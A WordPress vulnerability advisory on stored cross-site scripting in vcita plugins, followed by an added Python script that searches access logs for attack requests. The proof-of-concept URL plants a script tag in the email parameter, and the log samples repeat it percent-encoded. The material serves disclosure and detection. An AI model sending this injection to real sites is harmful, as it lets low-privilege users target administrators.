wpexploit | Wpvulndb | WPEX-ID:AF2C461C-D8CE-48E1-B802-092B5F56CFBA
Jun 02, 2023 - 12:00 a.m.

Multiple plugins by vcita - Contributor+ Stored Cross-Site Scripting

vcita plugin
stored cross-site scripting
live-site-parse-vcita-callback
exploit
security vulnerability

EPSS: 0.004 (Low), Percentile: 73.3%

The plugin does not sanitize the email field in the plugin settings, which could allow users with roles as low as contributor to inject arbitrary web scripts into the plugin settings page. The injected script could then target high-privilege users such as administrators.

https://example.com/wp-admin/admin.php?page=live-site-parse-vcita-callback&success=true&first_name=a-a&last_name=b&title=c&confirmation_token=d&confirmed=true&engage_delay=1&implementation_key=1&email=a"/><script>alert(1);</script>&uid=a
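To check whether a site has received requests of this shape, the following added example (not part of the original advisory or the plugin's code) scans web server access logs for hits on the callback page whose email parameter is not a plain email address. It assumes combined-log-format lines; the function name, the email pattern and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

CALLBACK_PAGE = "live-site-parse-vcita-callback"  # page slug from the advisory URL
# Conservative email shape (assumption); any other value in "email" is suspicious.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# Request field of a combined-log-format line: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
MARKUP_CHARS = set("<>\"'")

def suspicious_callback_requests(log_lines):
    """Return (line_number, decoded_email) for callback hits with a non-email value."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes values, so encoded markup is compared in clear form.
        params = parse_qs(target.query, keep_blank_values=True)
        if CALLBACK_PAGE not in params.get("page", []):
            continue
        for email in params.get("email", []):
            if MARKUP_CHARS & set(email) or not EMAIL_RE.fullmatch(email):
                hits.append((number, email))
    return hits

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [02/Jun/2023:10:00:01 +0000] "GET /wp-admin/admin.php'
    '?page=live-site-parse-vcita-callback&success=true&email=owner%40example.com'
    '&uid=a HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Jun/2023:10:02:13 +0000] "GET /wp-admin/admin.php'
    '?page=live-site-parse-vcita-callback&success=true'
    '&email=a%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&uid=a HTTP/1.1" 200 5120',
    '203.0.113.9 - - [02/Jun/2023:10:03:40 +0000] "GET /wp-admin/edit.php HTTP/1.1" 200 9001',
]

if __name__ == "__main__":
    for number, email in suspicious_callback_requests(SAMPLE_LOG):
        print(f"line {number}: suspicious email parameter {email!r}")
```

A hit shows that such a request reached the site, not that the value was stored; confirm by reviewing the email value saved in the plugin settings.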
